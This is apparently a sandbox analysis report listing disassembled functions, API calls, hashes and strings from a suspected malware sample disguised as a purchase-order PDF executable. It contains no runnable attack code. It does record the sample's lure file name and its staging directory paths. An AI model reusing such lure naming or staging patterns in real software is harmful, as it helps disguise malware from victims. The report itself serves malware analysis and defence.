                                                                                                                                    • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                    • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                    • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                    • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1090 401fc3-401fcf 1091 401fd5-401feb call 402bbf * 2 1090->1091 1092 40208e-402090 1090->1092 1102 401ffb-40200a LoadLibraryExW 1091->1102 1103 401fed-401ff9 GetModuleHandleW 1091->1103 1093 4021dc-4021e1 call 401423 1092->1093 1099 402a4c-402a5b 1093->1099 1100 40281e-402825 1093->1100 1100->1099 1105 40200c-40201b call 40649a 1102->1105 1106 402087-402089 1102->1106 1103->1102 1103->1105 1110 402056-40205b call 4051b4 1105->1110 1111 40201d-402023 1105->1111 1106->1093 1116 402060-402063 1110->1116 1112 402025-402031 call 401423 1111->1112 1113 40203c-40204f call 10001759 1111->1113 1112->1116 1123 402033-40203a 1112->1123 1118 402051-402054 1113->1118 1116->1099 1119 402069-402073 call 40383e 1116->1119 1118->1116 1119->1099 1124 402079-402082 FreeLibrary 1119->1124 1123->1116 1124->1099
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FFF
                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                    • String ID: fu
                                                                                                                                    • API String ID: 334405425-4160347406
                                                                                                                                    • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                    • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                                                    • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                    • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1126 405c59-405c65 1127 405c66-405c9a GetTickCount GetTempFileNameW 1126->1127 1128 405ca9-405cab 1127->1128 1129 405c9c-405c9e 1127->1129 1131 405ca3-405ca6 1128->1131 1129->1127 1130 405ca0 1129->1130 1130->1131
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                    • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                    • API String ID: 1716503409-44229769
                                                                                                                                    • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                    • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                    • wsprintfW.USER32 ref: 00406411
                                                                                                                                    • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll
                                                                                                                                    • API String ID: 2200240437-2744773210
                                                                                                                                    • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                    • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 00405AC2
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                      • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly,?,00000000,000000F0), ref: 00401645
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly, xrefs: 00401638
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly
                                                                                                                                    • API String ID: 1892508949-2045147251
                                                                                                                                    • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                    • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                                    • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                    • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                      • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                    • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000495,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd51BE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Enum$CloseOpenValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 167947723-0
                                                                                                                                    • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                    • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                                                    • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                    • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000495,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd51BE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                    • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                    • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                                                    • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                    • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                                                    APIs
                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                    • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                                                    • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                    • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                      • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                      • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                                      • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                    • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                    • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                                                    • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                    • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(00000000,00000000,?), ref: 00401DF2
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                    • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                    • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                                                    • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                    • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                    • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                    • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                    • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
